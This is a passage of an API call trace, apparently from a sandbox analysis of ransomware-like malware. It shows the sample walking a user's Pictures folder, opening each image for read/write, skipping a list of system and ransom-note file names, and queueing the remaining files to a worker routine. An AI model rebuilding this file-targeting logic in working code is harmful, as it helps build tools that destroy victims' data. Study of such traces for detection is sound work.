lpSrch="read_me.txt") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="desktop.ini") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="autorun.inf") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="iconcache.db") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="boot.ini") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.235] StrStrW (lpFirst="4m4dkna2mbvfqv.bmp", lpSrch="thumbs.db") returned 0x0 [0076.235] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 147 [0076.235] QueueUserWorkItem (Function=0x404e00, Context=0x9c4, Flags=0x0) returned 1 [0076.235] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88f6e80, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x50015230, ftLastAccessTime.dwHighDateTime=0x1d4c85b, ftLastWriteTime.dwLowDateTime=0x50015230, ftLastWriteTime.dwHighDateTime=0x1d4c85b, nFileSizeHigh=0x0, nFileSizeLow=0xf0b4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="7wJHk8IduLqY3JbXiKSR.png", cAlternateFileName="7WJHK8~1.PNG")) returned 1 [0076.235] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7wJHk8IduLqY3JbXiKSR.png") returned 67 [0076.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7wJHk8IduLqY3JbXiKSR.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7wjhk8idulqy3jbxiksr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c8 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="read_me.txt") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="autoexec.bat") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="desktop.ini") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="autorun.inf") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="ntuser.dat") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="iconcache.db") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="bootsect.bak") returned 0x0 [0076.235] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="boot.ini") returned 0x0 [0076.236] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.236] StrStrW (lpFirst="7wjhk8idulqy3jbxiksr.png", lpSrch="thumbs.db") returned 0x0 [0076.236] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 148 [0076.236] QueueUserWorkItem (Function=0x404e00, Context=0x9c8, Flags=0x0) returned 1 [0076.236] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6f8b800, ftCreationTime.dwHighDateTime=0x1d4d060, ftLastAccessTime.dwLowDateTime=0xfe8c6ad0, ftLastAccessTime.dwHighDateTime=0x1d4ca1b, ftLastWriteTime.dwLowDateTime=0xfe8c6ad0, ftLastWriteTime.dwHighDateTime=0x1d4ca1b, nFileSizeHigh=0x0, nFileSizeLow=0x53d9, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="8JbgwF.gif", cAlternateFileName="")) returned 1 [0076.236] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8JbgwF.gif") returned 53 [0076.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8JbgwF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8jbgwf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9cc [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="read_me.txt") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="autoexec.bat") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="desktop.ini") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="autorun.inf") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="ntuser.dat") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="iconcache.db") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="bootsect.bak") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="boot.ini") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="ntuser.dat.log") returned 0x0 [0076.236] StrStrW (lpFirst="8jbgwf.gif", lpSrch="thumbs.db") returned 0x0 [0076.236] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 149 [0076.236] QueueUserWorkItem (Function=0x404e00, Context=0x9cc, Flags=0x0) returned 1 [0076.236] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3911d010, ftCreationTime.dwHighDateTime=0x1d4c6a1, ftLastAccessTime.dwLowDateTime=0x1a446850, ftLastAccessTime.dwHighDateTime=0x1d4d0f6, ftLastWriteTime.dwLowDateTime=0x1a446850, ftLastWriteTime.dwHighDateTime=0x1d4d0f6, nFileSizeHigh=0x0, nFileSizeLow=0x6bc5, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="AAaKgAadS-cz 6.bmp", cAlternateFileName="AAAKGA~1.BMP")) returned 1 [0076.236] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AAaKgAadS-cz 6.bmp") returned 61 [0076.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AAaKgAadS-cz 6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aaakgaads-cz 6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d0 [0076.236] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="read_me.txt") returned 0x0 [0076.236] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="desktop.ini") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="autorun.inf") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="iconcache.db") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="boot.ini") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.237] StrStrW (lpFirst="aaakgaads-cz 6.bmp", lpSrch="thumbs.db") returned 0x0 [0076.237] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 150 [0076.237] QueueUserWorkItem (Function=0x404e00, Context=0x9d0, Flags=0x0) returned 1 [0076.237] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70fcf6b0, ftCreationTime.dwHighDateTime=0x1d4d422, ftLastAccessTime.dwLowDateTime=0x58b64da0, ftLastAccessTime.dwHighDateTime=0x1d4d1e7, ftLastWriteTime.dwLowDateTime=0x58b64da0, ftLastWriteTime.dwHighDateTime=0x1d4d1e7, nFileSizeHigh=0x0, nFileSizeLow=0xe55, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="BCq5.jpg", cAlternateFileName="")) returned 1 [0076.237] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BCq5.jpg") returned 51 [0076.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BCq5.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bcq5.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d4 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="read_me.txt") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="autoexec.bat") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="desktop.ini") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="autorun.inf") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="ntuser.dat") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="iconcache.db") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="bootsect.bak") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="boot.ini") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0076.237] StrStrW (lpFirst="bcq5.jpg", lpSrch="thumbs.db") returned 0x0 [0076.237] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 151 [0076.238] QueueUserWorkItem (Function=0x404e00, Context=0x9d4, Flags=0x0) returned 1 [0076.238] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea7910, ftCreationTime.dwHighDateTime=0x1d4cec1, ftLastAccessTime.dwLowDateTime=0xc17c87c0, ftLastAccessTime.dwHighDateTime=0x1d4cd62, ftLastWriteTime.dwLowDateTime=0xc17c87c0, ftLastWriteTime.dwHighDateTime=0x1d4cd62, nFileSizeHigh=0x0, nFileSizeLow=0xd599, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="BjEx3.gif", cAlternateFileName="")) returned 1 [0076.238] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjEx3.gif") returned 52 [0076.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BjEx3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bjex3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9d8 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="read_me.txt") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="autoexec.bat") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="desktop.ini") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="autorun.inf") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="ntuser.dat") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="iconcache.db") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="bootsect.bak") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="boot.ini") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="ntuser.dat.log") returned 0x0 [0076.238] StrStrW (lpFirst="bjex3.gif", lpSrch="thumbs.db") returned 0x0 [0076.238] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 152 [0076.238] QueueUserWorkItem (Function=0x404e00, Context=0x9d8, Flags=0x0) returned 1 [0076.238] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.238] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0076.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9dc [0076.238] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.238] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.238] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.239] CloseHandle (hObject=0x9dc) returned 1 [0076.239] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2adefbe0, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0x5f569f80, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x5f569f80, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0x12708, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="dxIPtsp3JyR.jpg", cAlternateFileName="DXIPTS~1.JPG")) returned 1 [0076.239] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dxIPtsp3JyR.jpg") returned 58 [0076.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dxIPtsp3JyR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dxiptsp3jyr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9dc [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="read_me.txt") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="autoexec.bat") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="desktop.ini") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="autorun.inf") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="ntuser.dat") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="iconcache.db") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="bootsect.bak") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="boot.ini") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="ntuser.dat.log") returned 0x0 [0076.239] StrStrW (lpFirst="dxiptsp3jyr.jpg", lpSrch="thumbs.db") returned 0x0 [0076.239] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 153 [0076.239] QueueUserWorkItem (Function=0x404e00, Context=0x9dc, Flags=0x0) returned 1 [0076.239] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b941a30, ftCreationTime.dwHighDateTime=0x1d4ccfa, ftLastAccessTime.dwLowDateTime=0xeda5f940, ftLastAccessTime.dwHighDateTime=0x1d4c7c1, ftLastWriteTime.dwLowDateTime=0xeda5f940, ftLastWriteTime.dwHighDateTime=0x1d4c7c1, nFileSizeHigh=0x0, nFileSizeLow=0x65f7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="EWm lGhs9RzKDH.bmp", cAlternateFileName="EWMLGH~1.BMP")) returned 1 [0076.239] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EWm lGhs9RzKDH.bmp") returned 61 [0076.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EWm lGhs9RzKDH.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ewm lghs9rzkdh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e0 [0076.239] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="read_me.txt") returned 0x0 [0076.239] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="desktop.ini") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="autorun.inf") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="iconcache.db") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="boot.ini") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.240] StrStrW (lpFirst="ewm lghs9rzkdh.bmp", lpSrch="thumbs.db") returned 0x0 [0076.240] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 154 [0076.240] QueueUserWorkItem (Function=0x404e00, Context=0x9e0, Flags=0x0) returned 1 [0076.240] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1368420, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x6bfbf370, ftLastAccessTime.dwHighDateTime=0x1d4ccc3, ftLastWriteTime.dwLowDateTime=0x6bfbf370, ftLastWriteTime.dwHighDateTime=0x1d4ccc3, nFileSizeHigh=0x0, nFileSizeLow=0x27e0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="f0-kIY.bmp", cAlternateFileName="")) returned 1 [0076.240] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f0-kIY.bmp") returned 53 [0076.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f0-kIY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f0-kiy.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e4 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="read_me.txt") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="autoexec.bat") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="desktop.ini") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="autorun.inf") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="ntuser.dat") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="iconcache.db") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="bootsect.bak") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="boot.ini") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0076.240] StrStrW (lpFirst="f0-kiy.bmp", lpSrch="thumbs.db") returned 0x0 [0076.240] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 155 [0076.240] QueueUserWorkItem (Function=0x404e00, Context=0x9e4, Flags=0x0) returned 1 [0076.240] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1611930, ftCreationTime.dwHighDateTime=0x1d4ced7, ftLastAccessTime.dwLowDateTime=0xd9858680, ftLastAccessTime.dwHighDateTime=0x1d4d57a, ftLastWriteTime.dwLowDateTime=0xd9858680, ftLastWriteTime.dwHighDateTime=0x1d4d57a, nFileSizeHigh=0x0, nFileSizeLow=0x17b79, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="f7hWfjYSu5W3Q.gif", cAlternateFileName="F7HWFJ~1.GIF")) returned 1 [0076.241] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f7hWfjYSu5W3Q.gif") returned 60 [0076.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\f7hWfjYSu5W3Q.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f7hwfjysu5w3q.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9e8 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="read_me.txt") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="autoexec.bat") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="desktop.ini") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="autorun.inf") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="ntuser.dat") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="iconcache.db") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="bootsect.bak") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="boot.ini") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="ntuser.dat.log") returned 0x0 [0076.241] StrStrW (lpFirst="f7hwfjysu5w3q.gif", lpSrch="thumbs.db") returned 0x0 [0076.241] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 156 [0076.241] QueueUserWorkItem (Function=0x404e00, Context=0x9e8, Flags=0x0) returned 1 [0076.241] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fb4e640, ftCreationTime.dwHighDateTime=0x1d4d4bf, ftLastAccessTime.dwLowDateTime=0x1d854d30, ftLastAccessTime.dwHighDateTime=0x1d4d0cf, ftLastWriteTime.dwLowDateTime=0x1d854d30, ftLastWriteTime.dwHighDateTime=0x1d4d0cf, nFileSizeHigh=0x0, nFileSizeLow=0xb9cb, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="GLq9ajQYOkYMyeyrKasw.gif", cAlternateFileName="GLQ9AJ~1.GIF")) returned 1 [0076.241] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GLq9ajQYOkYMyeyrKasw.gif") returned 67 [0076.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GLq9ajQYOkYMyeyrKasw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\glq9ajqyokymyeyrkasw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9ec [0076.241] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="read_me.txt") returned 0x0 [0076.241] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="autoexec.bat") returned 0x0 [0076.241] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="desktop.ini") returned 0x0 [0076.241] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="autorun.inf") returned 0x0 [0076.241] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="ntuser.dat") returned 0x0 [0076.242] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="iconcache.db") returned 0x0 [0076.242] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="bootsect.bak") returned 0x0 [0076.242] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="boot.ini") returned 0x0 [0076.242] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="ntuser.dat.log") returned 0x0 [0076.242] StrStrW (lpFirst="glq9ajqyokymyeyrkasw.gif", lpSrch="thumbs.db") returned 0x0 [0076.242] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 157 [0076.242] QueueUserWorkItem (Function=0x404e00, Context=0x9ec, Flags=0x0) returned 1 [0076.243] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c2c5460, ftCreationTime.dwHighDateTime=0x1d4c7f1, ftLastAccessTime.dwLowDateTime=0xa1775c20, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0xa1775c20, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0x1142d, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="IeUcz.bmp", cAlternateFileName="")) returned 1 [0076.243] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeUcz.bmp") returned 52 [0076.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 